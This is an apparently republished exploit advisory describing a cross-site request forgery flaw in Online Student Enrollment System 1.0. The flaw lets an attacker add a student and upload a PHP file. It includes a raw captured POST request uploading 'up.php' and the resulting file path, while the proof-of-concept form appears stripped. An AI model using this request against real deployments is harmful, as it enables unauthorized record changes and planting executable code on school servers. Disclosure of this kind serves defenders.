Online Student Enrollment System 1.0 – Cross-Site Request Forgery (Add Student) – Digitalmunition




Exploit/Advisories 1591420242_spider-orange.png

Published on June 25th, 2020 📆 | 1958 Views ⚑

0

Online Student Enrollment System 1.0 – Cross-Site Request Forgery (Add Student)

# Exploit Title: Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
# Google Dork: N/A
# Date: 2020-06-20
# Exploit Author: BKpatron
# Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com

# Vulnerability:

This product is unprotected against CSRF vulnerabilities.
The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests.
you can upload a PHP file here with CSRF.

# CSRF PoC( add student ,File Upload):








#HTTP Request: http://localhost/student_enrollment/admin/index.php?page=add-student POST /student_enrollment/admin/index.php?page=add-student HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------1586330740172 Content-Length: 1669 Referer: http://localhost/exploit2.php Cookie: _ga=GA1.1.1667382299.1577635358; PHPSESSID=2dhsgkdiavgfefp6g0qp63ruqe Connection: keep-alive Upgrade-Insecure-Requests: 1 -----------------------------1586330740172: undefined Content-Disposition: form-data; name="name" bkpatron -----------------------------1586330740172 Content-Disposition: form-data; name="roll" 333000 -----------------------------1586330740172 Content-Disposition: form-data; name="address" 0000 -----------------------------1586330740172 Content-Disposition: form-data; name="pcontact" 01911111111 -----------------------------1586330740172 Content-Disposition: form-data; name="class" 1st -----------------------------1586330740172 Content-Disposition: form-data; name="photo"; filename="up.php" Content-Type: application/octet-stream ... // uploaded file path: http://localhost/student_enrollment/admin/images/your_file.php

Source link

Tagged with:



Leave a Reply